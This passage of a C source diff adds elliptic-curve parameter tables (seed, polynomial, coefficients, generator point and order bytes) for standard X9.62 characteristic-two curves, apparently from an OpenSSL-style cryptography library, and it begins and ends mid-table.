+        NID_X9_62_characteristic_two_field, 20, 72, 2
+    },
+    {
+        /* seed */
+        0x2A, 0xA0, 0x58, 0xF7, 0x3A, 0x0E, 0x33, 0xAB, 0x48, 0x6B, 0x0F, 0x61,
+        0x04, 0x10, 0xC5, 0x3A, 0x7F, 0x13, 0x23, 0x10,
+        /* p */
+        0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x25,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* b */
+        0x02, 0xF4, 0x0E, 0x7E, 0x22, 0x21, 0xF2, 0x95, 0xDE, 0x29, 0x71, 0x17,
+        0xB7, 0xF3, 0xD6, 0x2F, 0x5C, 0x6A, 0x97, 0xFF, 0xCB, 0x8C, 0xEF, 0xF1,
+        0xCD, 0x6B, 0xA8, 0xCE, 0x4A, 0x9A, 0x18, 0xAD, 0x84, 0xFF, 0xAB, 0xBD,
+        0x8E, 0xFA, 0x59, 0x33, 0x2B, 0xE7, 0xAD, 0x67, 0x56, 0xA6, 0x6E, 0x29,
+        0x4A, 0xFD, 0x18, 0x5A, 0x78, 0xFF, 0x12, 0xAA, 0x52, 0x0E, 0x4D, 0xE7,
+        0x39, 0xBA, 0xCA, 0x0C, 0x7F, 0xFE, 0xFF, 0x7F, 0x29, 0x55, 0x72, 0x7A,
+        /* x */
+        0x03, 0x03, 0x00, 0x1D, 0x34, 0xB8, 0x56, 0x29, 0x6C, 0x16, 0xC0, 0xD4,
+        0x0D, 0x3C, 0xD7, 0x75, 0x0A, 0x93, 0xD1, 0xD2, 0x95, 0x5F, 0xA8, 0x0A,
+        0xA5, 0xF4, 0x0F, 0xC8, 0xDB, 0x7B, 0x2A, 0xBD, 0xBD, 0xE5, 0x39, 0x50,
+        0xF4, 0xC0, 0xD2, 0x93, 0xCD, 0xD7, 0x11, 0xA3, 0x5B, 0x67, 0xFB, 0x14,
+        0x99, 0xAE, 0x60, 0x03, 0x86, 0x14, 0xF1, 0x39, 0x4A, 0xBF, 0xA3, 0xB4,
+        0xC8, 0x50, 0xD9, 0x27, 0xE1, 0xE7, 0x76, 0x9C, 0x8E, 0xEC, 0x2D, 0x19,
+        /* y */
+        0x03, 0x7B, 0xF2, 0x73, 0x42, 0xDA, 0x63, 0x9B, 0x6D, 0xCC, 0xFF, 0xFE,
+        0xB7, 0x3D, 0x69, 0xD7, 0x8C, 0x6C, 0x27, 0xA6, 0x00, 0x9C, 0xBB, 0xCA,
+        0x19, 0x80, 0xF8, 0x53, 0x39, 0x21, 0xE8, 0xA6, 0x84, 0x42, 0x3E, 0x43,
+        0xBA, 0xB0, 0x8A, 0x57, 0x62, 0x91, 0xAF, 0x8F, 0x46, 0x1B, 0xB2, 0xA8,
+        0xB3, 0x53, 0x1D, 0x2F, 0x04, 0x85, 0xC1, 0x9B, 0x16, 0xE2, 0xF1, 0x51,
+        0x6E, 0x23, 0xDD, 0x3C, 0x1A, 0x48, 0x27, 0xAF, 0x1B, 0x8A, 0xC1, 0x5B,
+        /* order */
+        0x03, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xE6, 0x61, 0xCE, 0x18, 0xFF, 0x55, 0x98, 0x73, 0x08, 0x05, 0x9B, 0x18,
+        0x68, 0x23, 0x85, 0x1E, 0xC7, 0xDD, 0x9C, 0xA1, 0x16, 0x1D, 0xE9, 0x3D,
+        0x51, 0x74, 0xD6, 0x6E, 0x83, 0x82, 0xE9, 0xBB, 0x2F, 0xE8, 0x4E, 0x47
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 21 * 6];
+} _EC_X9_62_CHAR2_163V1 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 21, 2
+    },
+    {
+        /* seed */
+        0xD2, 0xC0, 0xFB, 0x15, 0x76, 0x08, 0x60, 0xDE, 0xF1, 0xEE, 0xF4, 0xD6,
+        0x96, 0xE6, 0x76, 0x87, 0x56, 0x15, 0x17, 0x54,
+        /* p */
+        0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x07,
+        /* a */
+        0x07, 0x25, 0x46, 0xB5, 0x43, 0x52, 0x34, 0xA4, 0x22, 0xE0, 0x78, 0x96,
+        0x75, 0xF4, 0x32, 0xC8, 0x94, 0x35, 0xDE, 0x52, 0x42,
+        /* b */
+        0x00, 0xC9, 0x51, 0x7D, 0x06, 0xD5, 0x24, 0x0D, 0x3C, 0xFF, 0x38, 0xC7,
+        0x4B, 0x20, 0xB6, 0xCD, 0x4D, 0x6F, 0x9D, 0xD4, 0xD9,
+        /* x */
+        0x07, 0xAF, 0x69, 0x98, 0x95, 0x46, 0x10, 0x3D, 0x79, 0x32, 0x9F, 0xCC,
+        0x3D, 0x74, 0x88, 0x0F, 0x33, 0xBB, 0xE8, 0x03, 0xCB,
+        /* y */
+        0x01, 0xEC, 0x23, 0x21, 0x1B, 0x59, 0x66, 0xAD, 0xEA, 0x1D, 0x3F, 0x87,
+        0xF7, 0xEA, 0x58, 0x48, 0xAE, 0xF0, 0xB7, 0xCA, 0x9F,
+        /* order */
+        0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xE6,
+        0x0F, 0xC8, 0x82, 0x1C, 0xC7, 0x4D, 0xAE, 0xAF, 0xC1
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 21 * 6];
+} _EC_X9_62_CHAR2_163V2 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 21, 2
+    },
+    {
+        /* seed */
+        0x53, 0x81, 0x4C, 0x05, 0x0D, 0x44, 0xD6, 0x96, 0xE6, 0x76, 0x87, 0x56,
+        0x15, 0x17, 0x58, 0x0C, 0xA4, 0xE2, 0x9F, 0xFD,
+        /* p */
+        0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x07,
+        /* a */
+        0x01, 0x08, 0xB3, 0x9E, 0x77, 0xC4, 0xB1, 0x08, 0xBE, 0xD9, 0x81, 0xED,
+        0x0E, 0x89, 0x0E, 0x11, 0x7C, 0x51, 0x1C, 0xF0, 0x72,
+        /* b */
+        0x06, 0x67, 0xAC, 0xEB, 0x38, 0xAF, 0x4E, 0x48, 0x8C, 0x40, 0x74, 0x33,
+        0xFF, 0xAE, 0x4F, 0x1C, 0x81, 0x16, 0x38, 0xDF, 0x20,
+        /* x */
+        0x00, 0x24, 0x26, 0x6E, 0x4E, 0xB5, 0x10, 0x6D, 0x0A, 0x96, 0x4D, 0x92,
+        0xC4, 0x86, 0x0E, 0x26, 0x71, 0xDB, 0x9B, 0x6C, 0xC5,
+        /* y */
+        0x07, 0x9F, 0x68, 0x4D, 0xDF, 0x66, 0x84, 0xC5, 0xCD, 0x25, 0x8B, 0x38,
+        0x90, 0x02, 0x1B, 0x23, 0x86, 0xDF, 0xD1, 0x9F, 0xC5,
+        /* order */
+        0x03, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFD, 0xF6,
+        0x4D, 0xE1, 0x15, 0x1A, 0xDB, 0xB7, 0x8F, 0x10, 0xA7
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 21 * 6];
+} _EC_X9_62_CHAR2_163V3 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 21, 2
+    },
+    {
+        /* seed */
+        0x50, 0xCB, 0xF1, 0xD9, 0x5C, 0xA9, 0x4D, 0x69, 0x6E, 0x67, 0x68, 0x75,
+        0x61, 0x51, 0x75, 0xF1, 0x6A, 0x36, 0xA3, 0xB8,
+        /* p */
+        0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x07,
+        /* a */
+        0x07, 0xA5, 0x26, 0xC6, 0x3D, 0x3E, 0x25, 0xA2, 0x56, 0xA0, 0x07, 0x69,
+        0x9F, 0x54, 0x47, 0xE3, 0x2A, 0xE4, 0x56, 0xB5, 0x0E,
+        /* b */
+        0x03, 0xF7, 0x06, 0x17, 0x98, 0xEB, 0x99, 0xE2, 0x38, 0xFD, 0x6F, 0x1B,
+        0xF9, 0x5B, 0x48, 0xFE, 0xEB, 0x48, 0x54, 0x25, 0x2B,
+        /* x */
+        0x02, 0xF9, 0xF8, 0x7B, 0x7C, 0x57, 0x4D, 0x0B, 0xDE, 0xCF, 0x8A, 0x22,
+        0xE6, 0x52, 0x47, 0x75, 0xF9, 0x8C, 0xDE, 0xBD, 0xCB,
+        /* y */
+        0x05, 0xB9, 0x35, 0x59, 0x0C, 0x15, 0x5E, 0x17, 0xEA, 0x48, 0xEB, 0x3F,
+        0xF3, 0x71, 0x8B, 0x89, 0x3D, 0xF5, 0x9A, 0x05, 0xD0,
+        /* order */
+        0x03, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFE, 0x1A,
+        0xEE, 0x14, 0x0F, 0x11, 0x0A, 0xFF, 0x96, 0x13, 0x09
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 23 * 6];
+} _EC_X9_62_CHAR2_176V1 = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 23, 0xFF6E
+    },
+    {
+        /* no seed */
+        /* p */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x07,
+        /* a */
+        0x00, 0xE4, 0xE6, 0xDB, 0x29, 0x95, 0x06, 0x5C, 0x40, 0x7D, 0x9D, 0x39,
+        0xB8, 0xD0, 0x96, 0x7B, 0x96, 0x70, 0x4B, 0xA8, 0xE9, 0xC9, 0x0B,
+        /* b */
+        0x00, 0x5D, 0xDA, 0x47, 0x0A, 0xBE, 0x64, 0x14, 0xDE, 0x8E, 0xC1, 0x33,
+        0xAE, 0x28, 0xE9, 0xBB, 0xD7, 0xFC, 0xEC, 0x0A, 0xE0, 0xFF, 0xF2,
+        /* x */
+        0x00, 0x8D, 0x16, 0xC2, 0x86, 0x67, 0x98, 0xB6, 0x00, 0xF9, 0xF0, 0x8B,
+        0xB4, 0xA8, 0xE8, 0x60, 0xF3, 0x29, 0x8C, 0xE0, 0x4A, 0x57, 0x98,
+        /* y */
+        0x00, 0x6F, 0xA4, 0x53, 0x9C, 0x2D, 0xAD, 0xDD, 0xD6, 0xBA, 0xB5, 0x16,
+        0x7D, 0x61, 0xB4, 0x36, 0xE1, 0xD9, 0x2B, 0xB1, 0x6A, 0x56, 0x2C,
+        /* order */
+        0x00, 0x00, 0x01, 0x00, 0x92, 0x53, 0x73, 0x97, 0xEC, 0xA4, 0xF6, 0x14,
+        0x57, 0x99, 0xD6, 0x2B, 0x0A, 0x19, 0xCE, 0x06, 0xFE, 0x26, 0xAD
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 24 * 6];
+} _EC_X9_62_CHAR2_191V1 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 24, 2
+    },
+    {
+        /* seed */
+        0x4E, 0x13, 0xCA, 0x54, 0x27, 0x44, 0xD6, 0x96, 0xE6, 0x76, 0x87, 0x56,
+        0x15, 0x17, 0x55, 0x2F, 0x27, 0x9A, 0x8C, 0x84,
+        /* p */
+        0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x01,
+        /* a */
+        0x28, 0x66, 0x53, 0x7B, 0x67, 0x67, 0x52, 0x63, 0x6A, 0x68, 0xF5, 0x65,
+        0x54, 0xE1, 0x26, 0x40, 0x27, 0x6B, 0x64, 0x9E, 0xF7, 0x52, 0x62, 0x67,
+        /* b */
+        0x2E, 0x45, 0xEF, 0x57, 0x1F, 0x00, 0x78, 0x6F, 0x67, 0xB0, 0x08, 0x1B,
+        0x94, 0x95, 0xA3, 0xD9, 0x54, 0x62, 0xF5, 0xDE, 0x0A, 0xA1, 0x85, 0xEC,
+        /* x */
+        0x36, 0xB3, 0xDA, 0xF8, 0xA2, 0x32, 0x06, 0xF9, 0xC4, 0xF2, 0x99, 0xD7,
+        0xB2, 0x1A, 0x9C, 0x36, 0x91, 0x37, 0xF2, 0xC8, 0x4A, 0xE1, 0xAA, 0x0D,
+        /* y */
+        0x76, 0x5B, 0xE7, 0x34, 0x33, 0xB3, 0xF9, 0x5E, 0x33, 0x29, 0x32, 0xE7,
+        0x0E, 0xA2, 0x45, 0xCA, 0x24, 0x18, 0xEA, 0x0E, 0xF9, 0x80, 0x18, 0xFB,
+        /* order */
+        0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x04, 0xA2, 0x0E, 0x90, 0xC3, 0x90, 0x67, 0xC8, 0x93, 0xBB, 0xB9, 0xA5
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 24 * 6];
+} _EC_X9_62_CHAR2_191V2 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 24, 4
+    },
+    {
+        /* seed */
+        0x08, 0x71, 0xEF, 0x2F, 0xEF, 0x24, 0xD6, 0x96, 0xE6, 0x76, 0x87, 0x56,
+        0x15, 0x17, 0x58, 0xBE, 0xE0, 0xD9, 0x5C, 0x15,
+        /* p */
+        0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x01,
+        /* a */
+        0x40, 0x10, 0x28, 0x77, 0x4D, 0x77, 0x77, 0xC7, 0xB7, 0x66, 0x6D, 0x13,
+        0x66, 0xEA, 0x43, 0x20, 0x71, 0x27, 0x4F, 0x89, 0xFF, 0x01, 0xE7, 0x18,
+        /* b */
+        0x06, 0x20, 0x04, 0x8D, 0x28, 0xBC, 0xBD, 0x03, 0xB6, 0x24, 0x9C, 0x99,
+        0x18, 0x2B, 0x7C, 0x8C, 0xD1, 0x97, 0x00, 0xC3, 0x62, 0xC4, 0x6A, 0x01,
+        /* x */
+        0x38, 0x09, 0xB2, 0xB7, 0xCC, 0x1B, 0x28, 0xCC, 0x5A, 0x87, 0x92, 0x6A,
+        0xAD, 0x83, 0xFD, 0x28, 0x78, 0x9E, 0x81, 0xE2, 0xC9, 0xE3, 0xBF, 0x10,
+        /* y */
+        0x17, 0x43, 0x43, 0x86, 0x62, 0x6D, 0x14, 0xF3, 0xDB, 0xF0, 0x17, 0x60,
+        0xD9, 0x21, 0x3A, 0x3E, 0x1C, 0xF3, 0x7A, 0xEC, 0x43, 0x7D, 0x66, 0x8A,
+        /* order */
+        0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x50, 0x50, 0x8C, 0xB8, 0x9F, 0x65, 0x28, 0x24, 0xE0, 0x6B, 0x81, 0x73
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 24 * 6];
+} _EC_X9_62_CHAR2_191V3 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 24, 6
+    },
+    {
+        /* seed */
+        0xE0, 0x53, 0x51, 0x2D, 0xC6, 0x84, 0xD6, 0x96, 0xE6, 0x76, 0x87, 0x56,
+        0x15, 0x17, 0x50, 0x67, 0xAE, 0x78, 0x6D, 0x1F,
+        /* p */
+        0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x01,
+        /* a */
+        0x6C, 0x01, 0x07, 0x47, 0x56, 0x09, 0x91, 0x22, 0x22, 0x10, 0x56, 0x91,
+        0x1C, 0x77, 0xD7, 0x7E, 0x77, 0xA7, 0x77, 0xE7, 0xE7, 0xE7, 0x7F, 0xCB,
+        /* b */
+        0x71, 0xFE, 0x1A, 0xF9, 0x26, 0xCF, 0x84, 0x79, 0x89, 0xEF, 0xEF, 0x8D,
+        0xB4, 0x59, 0xF6, 0x63, 0x94, 0xD9, 0x0F, 0x32, 0xAD, 0x3F, 0x15, 0xE8,
+        /* x */
+        0x37, 0x5D, 0x4C, 0xE2, 0x4F, 0xDE, 0x43, 0x44, 0x89, 0xDE, 0x87, 0x46,
+        0xE7, 0x17, 0x86, 0x01, 0x50, 0x09, 0xE6, 0x6E, 0x38, 0xA9, 0x26, 0xDD,
+        /* y */
+        0x54, 0x5A, 0x39, 0x17, 0x61, 0x96, 0x57, 0x5D, 0x98, 0x59, 0x99, 0x36,
+        0x6E, 0x6A, 0xD3, 0x4C, 0xE0, 0xA7, 0x7C, 0xD7, 0x12, 0x7B, 0x06, 0xBE,
+        /* order */
+        0x15, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55,
+        0x61, 0x0C, 0x0B, 0x19, 0x68, 0x12, 0xBF, 0xB6, 0x28, 0x8A, 0x3E, 0xA3
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 27 * 6];
+} _EC_X9_62_CHAR2_208W1 = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 27, 0xFE48
+    },
+    {
+        /* no seed */
+        /* p */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x07,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0xC8, 0x61, 0x9E, 0xD4, 0x5A, 0x62, 0xE6, 0x21, 0x2E, 0x11, 0x60,
+        0x34, 0x9E, 0x2B, 0xFA, 0x84, 0x44, 0x39, 0xFA, 0xFC, 0x2A, 0x3F, 0xD1,
+        0x63, 0x8F, 0x9E,
+        /* x */
+        0x00, 0x89, 0xFD, 0xFB, 0xE4, 0xAB, 0xE1, 0x93, 0xDF, 0x95, 0x59, 0xEC,
+        0xF0, 0x7A, 0xC0, 0xCE, 0x78, 0x55, 0x4E, 0x27, 0x84, 0xEB, 0x8C, 0x1E,
+        0xD1, 0xA5, 0x7A,
+        /* y */
+        0x00, 0x0F, 0x55, 0xB5, 0x1A, 0x06, 0xE7, 0x8E, 0x9A, 0xC3, 0x8A, 0x03,
+        0x5F, 0xF5, 0x20, 0xD8, 0xB0, 0x17, 0x81, 0xBE, 0xB1, 0xA6, 0xBB, 0x08,
+        0x61, 0x7D, 0xE3,
+        /* order */
+        0x00, 0x00, 0x01, 0x01, 0xBA, 0xF9, 0x5C, 0x97, 0x23, 0xC5, 0x7B, 0x6C,
+        0x21, 0xDA, 0x2E, 0xFF, 0x2D, 0x5E, 0xD5, 0x88, 0xBD, 0xD5, 0x71, 0x7E,
+        0x21, 0x2F, 0x9D
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 30 * 6];
+} _EC_X9_62_CHAR2_239V1 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 30, 4
+    },
+    {
+        /* seed */
+        0xD3, 0x4B, 0x9A, 0x4D, 0x69, 0x6E, 0x67, 0x68, 0x75, 0x61, 0x51, 0x75,
+        0xCA, 0x71, 0xB9, 0x20, 0xBF, 0xEF, 0xB0, 0x5D,
+        /* p */
+        0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x10, 0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0x32, 0x01, 0x08, 0x57, 0x07, 0x7C, 0x54, 0x31, 0x12, 0x3A, 0x46, 0xB8,
+        0x08, 0x90, 0x67, 0x56, 0xF5, 0x43, 0x42, 0x3E, 0x8D, 0x27, 0x87, 0x75,
+        0x78, 0x12, 0x57, 0x78, 0xAC, 0x76,
+        /* b */
+        0x79, 0x04, 0x08, 0xF2, 0xEE, 0xDA, 0xF3, 0x92, 0xB0, 0x12, 0xED, 0xEF,
+        0xB3, 0x39, 0x2F, 0x30, 0xF4, 0x32, 0x7C, 0x0C, 0xA3, 0xF3, 0x1F, 0xC3,
+        0x83, 0xC4, 0x22, 0xAA, 0x8C, 0x16,
+        /* x */
+        0x57, 0x92, 0x70, 0x98, 0xFA, 0x93, 0x2E, 0x7C, 0x0A, 0x96, 0xD3, 0xFD,
+        0x5B, 0x70, 0x6E, 0xF7, 0xE5, 0xF5, 0xC1, 0x56, 0xE1, 0x6B, 0x7E, 0x7C,
+        0x86, 0x03, 0x85, 0x52, 0xE9, 0x1D,
+        /* y */
+        0x61, 0xD8, 0xEE, 0x50, 0x77, 0xC3, 0x3F, 0xEC, 0xF6, 0xF1, 0xA1, 0x6B,
+        0x26, 0x8D, 0xE4, 0x69, 0xC3, 0xC7, 0x74, 0x4E, 0xA9, 0xA9, 0x71, 0x64,
+        0x9F, 0xC7, 0xA9, 0x61, 0x63, 0x05,
+        /* order */
+        0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x0F, 0x4D, 0x42, 0xFF, 0xE1, 0x49, 0x2A, 0x49, 0x93,
+        0xF1, 0xCA, 0xD6, 0x66, 0xE4, 0x47
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 30 * 6];
+} _EC_X9_62_CHAR2_239V2 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 30, 6
+    },
+    {
+        /* seed */
+        0x2A, 0xA6, 0x98, 0x2F, 0xDF, 0xA4, 0xD6, 0x96, 0xE6, 0x76, 0x87, 0x56,
+        0x15, 0x17, 0x5D, 0x26, 0x67, 0x27, 0x27, 0x7D,
+        /* p */
+        0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x10, 0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0x42, 0x30, 0x01, 0x77, 0x57, 0xA7, 0x67, 0xFA, 0xE4, 0x23, 0x98, 0x56,
+        0x9B, 0x74, 0x63, 0x25, 0xD4, 0x53, 0x13, 0xAF, 0x07, 0x66, 0x26, 0x64,
+        0x79, 0xB7, 0x56, 0x54, 0xE6, 0x5F,
+        /* b */
+        0x50, 0x37, 0xEA, 0x65, 0x41, 0x96, 0xCF, 0xF0, 0xCD, 0x82, 0xB2, 0xC1,
+        0x4A, 0x2F, 0xCF, 0x2E, 0x3F, 0xF8, 0x77, 0x52, 0x85, 0xB5, 0x45, 0x72,
+        0x2F, 0x03, 0xEA, 0xCD, 0xB7, 0x4B,
+        /* x */
+        0x28, 0xF9, 0xD0, 0x4E, 0x90, 0x00, 0x69, 0xC8, 0xDC, 0x47, 0xA0, 0x85,
+        0x34, 0xFE, 0x76, 0xD2, 0xB9, 0x00, 0xB7, 0xD7, 0xEF, 0x31, 0xF5, 0x70,
+        0x9F, 0x20, 0x0C, 0x4C, 0xA2, 0x05,
+        /* y */
+        0x56, 0x67, 0x33, 0x4C, 0x45, 0xAF, 0xF3, 0xB5, 0xA0, 0x3B, 0xAD, 0x9D,
+        0xD7, 0x5E, 0x2C, 0x71, 0xA9, 0x93, 0x62, 0x56, 0x7D, 0x54, 0x53, 0xF7,
+        0xFA, 0x6E, 0x22, 0x7E, 0xC8, 0x33,
+        /* order */
+        0x15, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55,
+        0x55, 0x55, 0x55, 0x3C, 0x6F, 0x28, 0x85, 0x25, 0x9C, 0x31, 0xE3, 0xFC,
+        0xDF, 0x15, 0x46, 0x24, 0x52, 0x2D
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 30 * 6];
+} _EC_X9_62_CHAR2_239V3 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 30, 0xA
+    },
+    {
+        /* seed */
+        0x9E, 0x07, 0x6F, 0x4D, 0x69, 0x6E, 0x67, 0x68, 0x75, 0x61, 0x51, 0x75,
+        0xE1, 0x1E, 0x9F, 0xDD, 0x77, 0xF9, 0x20, 0x41,
+        /* p */
+        0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x10, 0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0x01, 0x23, 0x87, 0x74, 0x66, 0x6A, 0x67, 0x76, 0x6D, 0x66, 0x76, 0xF7,
+        0x78, 0xE6, 0x76, 0xB6, 0x69, 0x99, 0x17, 0x66, 0x66, 0xE6, 0x87, 0x66,
+        0x6D, 0x87, 0x66, 0xC6, 0x6A, 0x9F,
+        /* b */
+        0x6A, 0x94, 0x19, 0x77, 0xBA, 0x9F, 0x6A, 0x43, 0x51, 0x99, 0xAC, 0xFC,
+        0x51, 0x06, 0x7E, 0xD5, 0x87, 0xF5, 0x19, 0xC5, 0xEC, 0xB5, 0x41, 0xB8,
+        0xE4, 0x41, 0x11, 0xDE, 0x1D, 0x40,
+        /* x */
+        0x70, 0xF6, 0xE9, 0xD0, 0x4D, 0x28, 0x9C, 0x4E, 0x89, 0x91, 0x3C, 0xE3,
+        0x53, 0x0B, 0xFD, 0xE9, 0x03, 0x97, 0x7D, 0x42, 0xB1, 0x46, 0xD5, 0x39,
+        0xBF, 0x1B, 0xDE, 0x4E, 0x9C, 0x92,
+        /* y */
+        0x2E, 0x5A, 0x0E, 0xAF, 0x6E, 0x5E, 0x13, 0x05, 0xB9, 0x00, 0x4D, 0xCE,
+        0x5C, 0x0E, 0xD7, 0xFE, 0x59, 0xA3, 0x56, 0x08, 0xF3, 0x38, 0x37, 0xC8,
+        0x16, 0xD8, 0x0B, 0x79, 0xF4, 0x61,
+        /* order */
+        0x0C, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
+        0xCC, 0xCC, 0xCC, 0xAC, 0x49, 0x12, 0xD2, 0xD9, 0xDF, 0x90, 0x3E, 0xF9,
+        0x88, 0x8B, 0x8A, 0x0E, 0x4C, 0xFF
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 35 * 6];
+} _EC_X9_62_CHAR2_272W1 = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 35, 0xFF06
+    },
+    {
+        /* no seed */
+        /* p */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
